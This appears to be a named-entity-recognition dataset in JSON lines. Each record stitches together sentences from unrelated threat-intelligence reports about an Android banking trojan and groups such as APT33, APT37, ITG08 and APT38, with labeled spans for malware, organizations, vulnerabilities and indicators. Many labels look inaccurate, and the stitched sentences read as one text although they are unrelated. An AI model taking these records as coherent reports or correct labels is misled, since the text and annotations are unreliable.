Specifically , the targeting of organizations in the aerospace and energy sectors indicates that the APT33 is likely in search of strategic intelligence capable of benefitting a government or military sponsor .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 149, "end": 179, "label": "Organization"}, {"start": 235, "end": 245, "label": "Organization"}, {"start": 369, "end": 378, "label": "Organization"}, {"start": 383, "end": 397, "label": "Organization"}, {"start": 417, "end": 422, "label": "Organization"}, {"start": 494, "end": 504, "label": "Organization"}, {"start": 508, "end": 516, "label": "Organization"}]} {"text": "Trojan architecture and capabilities This malware is written in .NET using the Xamarin environment for mobile applications . China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military aviation capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": [{"start": 64, "end": 68, "label": "System"}, {"start": 79, "end": 86, "label": "System"}, {"start": 125, "end": 138, "label": "System"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 221, "end": 238, "label": "Organization"}, {"start": 316, "end": 321, "label": "Organization"}, {"start": 334, "end": 342, "label": "Organization"}, {"start": 456, "end": 464, "label": "Organization"}, {"start": 500, "end": 508, "label": "Organization"}]} {"text": "The main DLL is called \" Reznov.DLL . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . 
We expect APT33 activity will continue to cover a broad scope of targeted entities , and may spread into other regions and sectors as Iranian interests dictate .", "spans": [{"start": 25, "end": 35, "label": "Indicator"}, {"start": 38, "end": 51, "label": "Malware"}, {"start": 74, "end": 83, "label": "Organization"}, {"start": 96, "end": 103, "label": "Malware"}]} {"text": "'' This DLL contains one root class called \" eClient , '' which is the core of the trojan . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": [{"start": 92, "end": 103, "label": "Organization"}, {"start": 127, "end": 140, "label": "System"}, {"start": 252, "end": 261, "label": "Organization"}, {"start": 272, "end": 285, "label": "System"}, {"start": 326, "end": 331, "label": "Organization"}, {"start": 354, "end": 359, "label": "Organization"}]} {"text": "The imports reveal the use of a second DLL called \" eCommon.dll . Here , we investigate a campaign targeting an Asian government organization . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" ( referred to as GroupB in this blog post ) to APT33 , operating at the behest of the Iranian government .", "spans": [{"start": 52, "end": 63, "label": "Indicator"}, {"start": 118, "end": 141, "label": "Organization"}, {"start": 161, "end": 190, "label": "Organization"}, {"start": 297, "end": 302, "label": "Organization"}]} {"text": "'' We determined that the \" eCommon '' file contains support code and structures that are platform independent . 
We observed another campaign targeting an organisation located in Lebanon . The Elfin group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": [{"start": 193, "end": 204, "label": "Organization"}, {"start": 211, "end": 216, "label": "Organization"}]} {"text": "The main DLL also contains eClient subclasses that implement some of the native capabilities . China Chopper contains a remote shell (Virtual Terminal) function that has a first suggested command of netstat an|find ESTABLISHED . On May 16 , 2019 FireEye 's Advanced Practices team attributed the remaining \" suspected APT33 activity \" to APT33 , operating at the behest of the Iranian government .", "spans": [{"start": 95, "end": 108, "label": "Malware"}, {"start": 188, "end": 195, "label": "Malware"}, {"start": 246, "end": 275, "label": "Organization"}, {"start": 338, "end": 343, "label": "Organization"}]} {"text": "The package certificate is issued under the package name , which also resembles the name of the main DLL name . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe . APT37 has likely been active since at least 2012 and focuses on targeting the public and private sectors primarily in South Korea .", "spans": [{"start": 237, "end": 250, "label": "Malware"}, {"start": 254, "end": 269, "label": "Malware"}, {"start": 272, "end": 277, "label": "Organization"}]} {"text": "Certificate information The Android package is named \" verReznov.Coampany . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . 
In 2017 , APT37 expanded its targeting beyond the Korean peninsula to include Japan , Vietnam and the Middle East , and to a wider range of industry verticals , including chemicals , electronics , manufacturing , aerospace , automotive and healthcare entities .", "spans": [{"start": 28, "end": 35, "label": "System"}, {"start": 55, "end": 73, "label": "Indicator"}, {"start": 80, "end": 84, "label": "Malware"}, {"start": 85, "end": 97, "label": "Malware"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 382, "end": 391, "label": "Organization"}, {"start": 394, "end": 405, "label": "Organization"}, {"start": 408, "end": 421, "label": "Organization"}, {"start": 424, "end": 433, "label": "Organization"}, {"start": 436, "end": 446, "label": "Organization"}, {"start": 451, "end": 470, "label": "Organization"}]} {"text": "'' The application uses the label \" Installer '' and its name is \" android.app.Application . The actor attempts to exploit CVE-2018\u20138440 \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified proof-of-concept exploit . 
In 2017 , APT37 targeted a company in Middle East that entered into a joint venture with the North Korean government to provide telecommunications service to the country .", "spans": [{"start": 36, "end": 45, "label": "Indicator"}, {"start": 67, "end": 90, "label": "Indicator"}, {"start": 97, "end": 102, "label": "Organization"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 165, "end": 178, "label": "Vulnerability"}, {"start": 301, "end": 317, "label": "Vulnerability"}, {"start": 318, "end": 325, "label": "Vulnerability"}, {"start": 338, "end": 343, "label": "Organization"}, {"start": 456, "end": 482, "label": "Organization"}]} {"text": "'' Package permissions The trojan declares numerous permissions in the manifest , from which we should highlight the BIND_DEVICE_ADMIN , which provides nearly full control of the device to the trojan . The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server . While not conclusive by itself , the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33 's familiarity with them and lends support to the assessment that APT33 may be based in Iran .", "spans": [{"start": 206, "end": 214, "label": "Organization"}, {"start": 474, "end": 491, "label": "Organization"}, {"start": 511, "end": 516, "label": "Organization"}, {"start": 583, "end": 588, "label": "Organization"}]} {"text": "This trojan is highly evolved in its design . The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims . 
North Korean defector and human rights-related targeting provides further evidence that APT37 conducts operations aligned with the interests of North Korea .", "spans": [{"start": 72, "end": 83, "label": "Organization"}, {"start": 252, "end": 257, "label": "Organization"}]} {"text": "It has modular architecture implemented in the form of plugins , or it can receive new .NET source code , which will be compiled on the device in runtime . From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts . In 2017 , APT37 targeted a Middle Eastern company that entered into a joint venture with the North Korean government to provide telecommunications service to the country ( read on for a case study ) .", "spans": [{"start": 87, "end": 91, "label": "System"}, {"start": 277, "end": 289, "label": "Organization"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 429, "end": 436, "label": "Organization"}, {"start": 515, "end": 541, "label": "Organization"}]} {"text": "Initialization of the compiler object The plugins can be added in runtime , or they can be added as a package resource at packaging time . We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 . 
APT37 targeted a research fellow , advisory member , and journalist associated with different North Korean human rights issues and strategic organizations .", "spans": [{"start": 182, "end": 193, "label": "Organization"}, {"start": 224, "end": 233, "label": "Organization"}, {"start": 282, "end": 287, "label": "Organization"}, {"start": 299, "end": 314, "label": "Organization"}, {"start": 317, "end": 332, "label": "Organization"}, {"start": 339, "end": 349, "label": "Organization"}, {"start": 413, "end": 436, "label": "Organization"}]} {"text": "This means that the authors or the operators can add capabilities without the need to recompile and upgrade the trojan package on the device . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . APT37 distributed SLOWDRIFT malware using a lure referencing the Korea Global Forum against academic and strategic institutions located in South Korea .", "spans": [{"start": 147, "end": 160, "label": "Malware"}, {"start": 289, "end": 302, "label": "Vulnerability"}, {"start": 305, "end": 318, "label": "Vulnerability"}, {"start": 323, "end": 336, "label": "Vulnerability"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 399, "end": 404, "label": "Organization"}, {"start": 417, "end": 426, "label": "Malware"}, {"start": 427, "end": 434, "label": "Malware"}, {"start": 491, "end": 499, "label": "Organization"}, {"start": 504, "end": 526, "label": "Organization"}]} {"text": "Trojan native capabilities This is a full-fledged trojan with capabilities ranging from those of a banking trojan to a full spying trojan . Previously , Cloud Atlas dropped its validator\u201d implant named PowerShower\u201d directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 . 
We believe a organization located in Middle East was targeted by APT37 because it had been involved with a North Korean company and a business deal went bad .", "spans": [{"start": 153, "end": 164, "label": "Organization"}, {"start": 280, "end": 294, "label": "Vulnerability"}, {"start": 306, "end": 319, "label": "Vulnerability"}, {"start": 387, "end": 392, "label": "Organization"}, {"start": 442, "end": 449, "label": "Organization"}]} {"text": "This means that the malware can do anything from harvest the user 's banking credentials , to monitoring the device 's location . This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage . In one instance , APT37 weaponized a video downloader application with KARAE malware that was indiscriminately distributed to South Korean victims through torrent websites .", "spans": [{"start": 179, "end": 190, "label": "Organization"}, {"start": 252, "end": 257, "label": "Organization"}, {"start": 305, "end": 310, "label": "Malware"}, {"start": 311, "end": 318, "label": "Malware"}]} {"text": "There are several indicators ( see section \" trojan activity '' below ) that it is in its last stages of development , but it has the potential to be a serious threat . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . 
FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": [{"start": 169, "end": 180, "label": "Organization"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 294, "end": 299, "label": "Organization"}, {"start": 312, "end": 320, "label": "Vulnerability"}, {"start": 321, "end": 332, "label": "System"}, {"start": 349, "end": 362, "label": "Vulnerability"}, {"start": 379, "end": 386, "label": "Malware"}, {"start": 387, "end": 394, "label": "Malware"}]} {"text": "Trojan details Upon boot , the trojan will start by populating a shared preferences file with the configuration it has on its internal structures . During its recent campaigns , Cloud Atlas used a new polymorphic\u201d infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system . FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": [{"start": 178, "end": 189, "label": "Organization"}, {"start": 414, "end": 441, "label": "Organization"}, {"start": 488, "end": 493, "label": "Organization"}, {"start": 506, "end": 514, "label": "Vulnerability"}, {"start": 515, "end": 526, "label": "System"}, {"start": 543, "end": 556, "label": "Vulnerability"}, {"start": 573, "end": 580, "label": "Malware"}, {"start": 581, "end": 588, "label": "Malware"}]} {"text": "Afterward , it will start several timers to execute different tasks . The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s . 
In April 2017 , APT37 targeted South Korean military and government organizations with the DOGCALL backdoor and RUHAPPY wiper malware .", "spans": [{"start": 74, "end": 89, "label": "Organization"}, {"start": 159, "end": 169, "label": "Organization"}, {"start": 174, "end": 182, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 260, "end": 268, "label": "Organization"}, {"start": 273, "end": 297, "label": "Organization"}, {"start": 307, "end": 323, "label": "Malware"}, {"start": 328, "end": 349, "label": "Malware"}]} {"text": "The first timer will be fired on the configured interval ( 20 seconds in this case ) , pinging the command and control ( C2 ) server . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations .", "spans": [{"start": 235, "end": 250, "label": "Organization"}, {"start": 317, "end": 322, "label": "Organization"}, {"start": 342, "end": 347, "label": "Malware"}, {"start": 348, "end": 355, "label": "Malware"}]} {"text": "The response can either be a simple \" OK , '' or can be a request to perform some action on the device . In one article published in the Kharkiv Observer \u2013 an independent Ukranian online publication \u2013 an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group . 
We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea .", "spans": [{"start": 250, "end": 277, "label": "Organization"}, {"start": 324, "end": 339, "label": "Organization"}, {"start": 378, "end": 383, "label": "Organization"}]} {"text": "The second timer will run every five seconds and it will try to enable the WiFi if it 's disabled . Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait . The compilation times of APT37 malware is consistent with a developer operating in the North Korea time zone ( UTC +8:30 ) and follows what is believed to be a typical North Korean workday .", "spans": [{"start": 100, "end": 115, "label": "Organization"}, {"start": 143, "end": 156, "label": "Organization"}, {"start": 235, "end": 244, "label": "System"}, {"start": 280, "end": 285, "label": "Malware"}, {"start": 286, "end": 293, "label": "Malware"}]} {"text": "The third timer will fire every 10 seconds and will attempt to register the device into the C2 and register wake-up locks on the system to control the device 's status . Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files . The majority of APT37 activity continues to target South Korea , North Korean defectors , and organizations and individuals involved in Korean Peninsula reunification efforts .", "spans": [{"start": 175, "end": 179, "label": "Organization"}, {"start": 255, "end": 260, "label": "System"}, {"start": 394, "end": 403, "label": "Organization"}]} {"text": "During the trojan registration stage , the trojan exfiltrates private information such as the phone 's model , IMEI , phone number and country . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content . 
Similarly , APT37 targeting of a company located in Middle East in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": [{"start": 159, "end": 166, "label": "Malware"}, {"start": 227, "end": 240, "label": "Vulnerability"}, {"start": 290, "end": 295, "label": "Organization"}]} {"text": "It will also report the version of Android that the phone is running and any additional capabilities . During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 . Similarly , APT37 targeting of a Middle Eastern company in 2017 is also consistent with North Korean objectives given the entity 's extensive relationships inside North Korea .", "spans": [{"start": 35, "end": 42, "label": "System"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 249, "end": 253, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 304, "end": 311, "label": "Organization"}]} {"text": "Device registration This is the last of the three main timers that are created . More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites \u2014 a technique known as online skimming \u2014 thereby stealing payment card data transmitted to the vendor by unsuspecting customers . 
In May 2017 , APT37 used a bank liquidation letter as a spear phishing lure against a board member of a Middle Eastern financial company .", "spans": [{"start": 97, "end": 102, "label": "Organization"}, {"start": 131, "end": 154, "label": "Organization"}, {"start": 378, "end": 383, "label": "Organization"}, {"start": 450, "end": 462, "label": "Organization"}, {"start": 483, "end": 500, "label": "Organization"}]} {"text": "The trojan will register the SMS handler , which will forward the contents and the sender of all of the SMS messages on the phone to the C2 . This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider . Though they have primarily tapped other tracked suspected North Korean teams to carry out the most aggressive actions , APT37 is an additional tool available to the regime , perhaps even desirable for its relative obscurity .", "spans": [{"start": 172, "end": 177, "label": "Organization"}, {"start": 400, "end": 405, "label": "Organization"}]} {"text": "The final step in the trojan 's initialization is the escalation and maintenance of privileges in the device . ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe . ScarCruft is a relatively new APT group , victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": [{"start": 111, "end": 116, "label": "Organization"}, {"start": 248, "end": 257, "label": "Organization"}, {"start": 279, "end": 297, "label": "Organization"}, {"start": 323, "end": 332, "label": "Organization"}]} {"text": "This is done both by requesting admin privileges on the device and asking the user to allow the application to access the device 's settings . Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 . 
Certain details , such as using the same infrastructure and targeting , make us believe that Operation Daybreak is being done by the ScarCruft APT group .", "spans": [{"start": 161, "end": 166, "label": "Organization"}, {"start": 177, "end": 195, "label": "System"}, {"start": 367, "end": 376, "label": "Organization"}]} {"text": "Privilege escalation requests The screens asking for the user 's approval wo n't close unless the user approves the privilege escalation . Attackers use it to create , expand and cement their foothold in compromised environments . Prior to the discovery of Operation Daybreak , we observed the ScarCruft APT launching a series of attacks in Operation Erebus .", "spans": [{"start": 139, "end": 148, "label": "Organization"}, {"start": 294, "end": 307, "label": "Organization"}]} {"text": "If the user closes the windows , they will appear again due to the timer configuration . Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails .", "spans": [{"start": 98, "end": 103, "label": "Organization"}, {"start": 109, "end": 141, "label": "System"}, {"start": 252, "end": 261, "label": "Organization"}]} {"text": "After the installation of the trojan , it will wait randomly between three and five minutes to activate one of the native capabilities \u2014 these are implemented on the eClient subclass called \" GoogleCC . Let\u2019s take a closer look at ITG08\u2019s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . 
Operation Daybreak appears to have been launched by APT37 to infect high profile targets through spear-phishing e-mails .", "spans": [{"start": 231, "end": 238, "label": "Organization"}, {"start": 394, "end": 412, "label": "Malware"}, {"start": 467, "end": 472, "label": "Organization"}]} {"text": "'' This class will open a WebView with a Google-themed page asking for payment in order to use the Google services . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . On occasion the APT37 directly included the ROKRAT payload in the malicious document and during other campaigns the attackers leveraged multi-stage infection processes .", "spans": [{"start": 41, "end": 54, "label": "Organization"}, {"start": 99, "end": 105, "label": "Organization"}, {"start": 148, "end": 165, "label": "Malware"}, {"start": 178, "end": 186, "label": "Malware"}, {"start": 191, "end": 209, "label": "Malware"}, {"start": 249, "end": 256, "label": "Malware"}, {"start": 275, "end": 280, "label": "Organization"}, {"start": 303, "end": 309, "label": "Malware"}, {"start": 375, "end": 384, "label": "Organization"}]} {"text": "This will take the user through several steps until it collects all the necessary credit card information , which will be checked online and exfiltrated to the C2 . X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library (DLL) , as described below , to create a reverse shell and connect to a remote host . In the early part of 2017 , Group123 started the \" Evil New Year \" campaign .", "spans": [{"start": 165, "end": 177, "label": "Organization"}, {"start": 198, "end": 216, "label": "Malware"}, {"start": 444, "end": 452, "label": "Organization"}]} {"text": "During this process , an amount of money , configured by the malicious operator , is requested to the user . 
Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment . In November 2017 , Talos observed the latest Group123 campaign of the year , which included a new version of ROKRAT being used in the latest wave of attacks .", "spans": [{"start": 118, "end": 123, "label": "Organization"}, {"start": 178, "end": 181, "label": "System"}, {"start": 186, "end": 196, "label": "System"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 395, "end": 401, "label": "Malware"}]} {"text": "Steps to request the user 's credit card information In our sample configuration , the request for the views above can not be canceled or removed from the screen \u2014 behaving just like a screen lock that wo n't be disabled without providing credit card information . The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz . Group123 is constantly evolving as the new fileless capability that was added to ROKRAT demonstrates .", "spans": [{"start": 269, "end": 278, "label": "Organization"}, {"start": 430, "end": 438, "label": "Organization"}, {"start": 511, "end": 517, "label": "Malware"}]} {"text": "All communication with the C2 is done over HTTP . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . 
In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT .", "spans": [{"start": 69, "end": 78, "label": "System"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 166, "end": 174, "label": "System"}, {"start": 235, "end": 243, "label": "Organization"}, {"start": 261, "end": 273, "label": "Malware"}, {"start": 338, "end": 344, "label": "Malware"}]} {"text": "It will use either a standard web request or it will write data into a web socket if the first method fails . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . However , we asses with medium confidence that NavRAT is linked to Group123 .", "spans": [{"start": 143, "end": 148, "label": "Organization"}, {"start": 172, "end": 198, "label": "System"}, {"start": 248, "end": 254, "label": "Malware"}, {"start": 268, "end": 276, "label": "Organization"}]} {"text": "The C2 can also use WebSocket as a backup communication channel . Mimikatz is a post-exploitation tool that allows attackers to extract credentials from volatile memory . APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world 's largest cyber heists .", "spans": [{"start": 66, "end": 74, "label": "Malware"}, {"start": 128, "end": 147, "label": "Malware"}, {"start": 171, "end": 176, "label": "Organization"}, {"start": 292, "end": 314, "label": "Organization"}, {"start": 357, "end": 369, "label": "Organization"}]} {"text": "Before sending any data to the C2 using the trojan attempts to disguise its data , the data is serialized using JSON , which is then encoded in Base64 . After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components . 
APT38 is a financially motivated North Korean regime-backed group responsible for conducting destructive attacks against financial institutions , as well as some of the world .", "spans": [{"start": 255, "end": 260, "label": "Organization"}, {"start": 283, "end": 309, "label": "System"}, {"start": 371, "end": 376, "label": "Organization"}, {"start": 492, "end": 514, "label": "Organization"}]} {"text": "However , the trojan replaces the '= ' by 'AAAZZZXXX ' , the '+ ' by '| ' and the '/ ' by ' . Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack . APT38 is believed to operate more similarly to an espionage operation , carefully conducting reconnaissance within compromised financial institutions and balancing financially motivated objectives with learning about internal systems .", "spans": [{"start": 107, "end": 116, "label": "System"}, {"start": 133, "end": 138, "label": "Organization"}, {"start": 166, "end": 190, "label": "System"}, {"start": 195, "end": 213, "label": "System"}, {"start": 264, "end": 269, "label": "Organization"}, {"start": 391, "end": 413, "label": "Organization"}]} {"text": "' to disguise the Base64 . After injecting Meterpreter into memory , the attacker had complete control of the infected device . The group has compromised more than 16 organizations in at least 13 different countries , sometimes simultaneously , since at least 2014 .", "spans": [{"start": 73, "end": 81, "label": "Organization"}]} {"text": "Request encoding process The HTTP requests follow the format below , while on the WebSocket only the query data is written . IBM X-Force IRIS has gained insight into ITG08\u2019s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms . 
APT38 shares malware code and other development resources with TEMP.Hermit North Korean cyber espionage activity , although we consider APT38 .", "spans": [{"start": 125, "end": 141, "label": "Organization"}, {"start": 166, "end": 173, "label": "Organization"}, {"start": 256, "end": 261, "label": "System"}, {"start": 301, "end": 306, "label": "Organization"}, {"start": 364, "end": 375, "label": "Organization"}, {"start": 437, "end": 442, "label": "Organization"}]} {"text": "? After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices . We consider APT38 's operations more global and highly specialized for targeting the financial sector .", "spans": [{"start": 67, "end": 72, "label": "Organization"}, {"start": 82, "end": 100, "label": "System"}, {"start": 164, "end": 169, "label": "Organization"}, {"start": 237, "end": 253, "label": "Organization"}]} {"text": "q= - : As is common with trojans , the communication is always initiated by the trojan on the device to the C2 . In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08\u2019s use of PowerShell to conduct malicious activity . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renown for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware .", "spans": [{"start": 223, "end": 230, "label": "Organization"}, {"start": 238, "end": 248, "label": "System"}, {"start": 281, "end": 286, "label": "Organization"}, {"start": 343, "end": 368, "label": "Organization"}, {"start": 439, "end": 461, "label": "Organization"}]} {"text": "The request codes are actually replies to the C2 action requests , which are actually called \" responses . 
The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" .", "spans": [{"start": 111, "end": 117, "label": "Organization"}, {"start": 167, "end": 196, "label": "Organization"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 234, "end": 252, "label": "Organization"}, {"start": 263, "end": 268, "label": "Organization"}]} {"text": "'' There are 27 response codes that the C2 can use to make requests to the trojan , which pretty much match what 's listed in the capabilities section . CTU research indicates that LYCEUM may have been active as early as April 2018 . Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship .", "spans": [{"start": 153, "end": 156, "label": "Organization"}, {"start": 181, "end": 187, "label": "Organization"}, {"start": 409, "end": 427, "label": "Organization"}]} {"text": "Error Registration Ok Empty SendSMS RequestGoogleCC Wipe OpenBrowser SendUSSD RequestSMSList RequestAppList RequestLocation ShowNotification SetLockPassword LockNow MuteSound LoadScript LoadPlugin ServerChange StartApp CallPhone SetPingTimer SMSBroadcast RequestContacts AddInject RemoveInject Evaluate Another feature of this trojan is the ability to register injects , which are JavaScript snippets of code . In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East . 
Based on observed activity , we judge that APT38 's primary mission is targeting financial institutions and manipulating inter-bank financial systems to raise large sums of money for the North Korean regime .", "spans": [{"start": 436, "end": 441, "label": "Organization"}, {"start": 560, "end": 565, "label": "Organization"}, {"start": 598, "end": 620, "label": "Organization"}]} {"text": "These will be executed in a WebView object created by the trojan . This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 . Since 2015 , APT38 has attempted to steal hundreds of millions of dollars from financial institutions .", "spans": [{"start": 235, "end": 240, "label": "Organization"}, {"start": 301, "end": 323, "label": "Organization"}]} {"text": "This gives the operators the capability to trick the user into accessing any site while stealing the user 's cookies or forging form fields , like account numbers or phone numbers . Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 . 
APT38 has pursued their main objective of targeting banks and financial entities since at least 2014 .", "spans": [{"start": 261, "end": 273, "label": "Organization"}, {"start": 295, "end": 301, "label": "Organization"}, {"start": 304, "end": 311, "label": "Organization"}, {"start": 318, "end": 323, "label": "Organization"}, {"start": 328, "end": 342, "label": "Organization"}, {"start": 357, "end": 362, "label": "Organization"}, {"start": 367, "end": 372, "label": "Organization"}, {"start": 375, "end": 380, "label": "Organization"}, {"start": 427, "end": 432, "label": "Organization"}, {"start": 437, "end": 455, "label": "Organization"}]} {"text": "Trojan activity At the time of the writing of this post , all URLs ( see IOC section ) found on the sample were inactive , and it does not seem to be widespread . When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed . We surmise that the targeting of banks , media , and government agencies is conducted in support of APT38 's primary mission .", "spans": [{"start": 168, "end": 171, "label": "Organization"}, {"start": 218, "end": 224, "label": "Organization"}, {"start": 350, "end": 355, "label": "Organization"}, {"start": 358, "end": 363, "label": "Organization"}, {"start": 370, "end": 389, "label": "Organization"}, {"start": 417, "end": 422, "label": "Organization"}]} {"text": "There are some indicators that this sample is just a test sample on its final stages of development . Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools . 
The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions .", "spans": [{"start": 131, "end": 137, "label": "Organization"}, {"start": 256, "end": 276, "label": "System"}, {"start": 283, "end": 288, "label": "Organization"}, {"start": 298, "end": 310, "label": "Organization"}, {"start": 340, "end": 356, "label": "Organization"}, {"start": 438, "end": 460, "label": "Organization"}]} {"text": "There are several strings and labels still mentioning 'test ' or 'testcc ' \u2014 even the URL used for the credit card data exfiltration is named \" testcc.php . The developer consistently used Accept-Enconding\u201d (note the extra \u2018n\u2019) in all DanBot samples analyzed by CTU researchers . APT38 also targeted financial transaction exchange companies likely because of their proximity to banks .", "spans": [{"start": 144, "end": 154, "label": "Indicator"}, {"start": 235, "end": 241, "label": "Malware"}, {"start": 262, "end": 265, "label": "Organization"}, {"start": 280, "end": 285, "label": "Organization"}, {"start": 300, "end": 340, "label": "Organization"}, {"start": 378, "end": 383, "label": "Organization"}]} {"text": "'' Debug information on logcat Another indicator is the amount of debugging information the trojan is still generating \u2014 a production-level trojan would keep its logging to a minimum . Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP . 
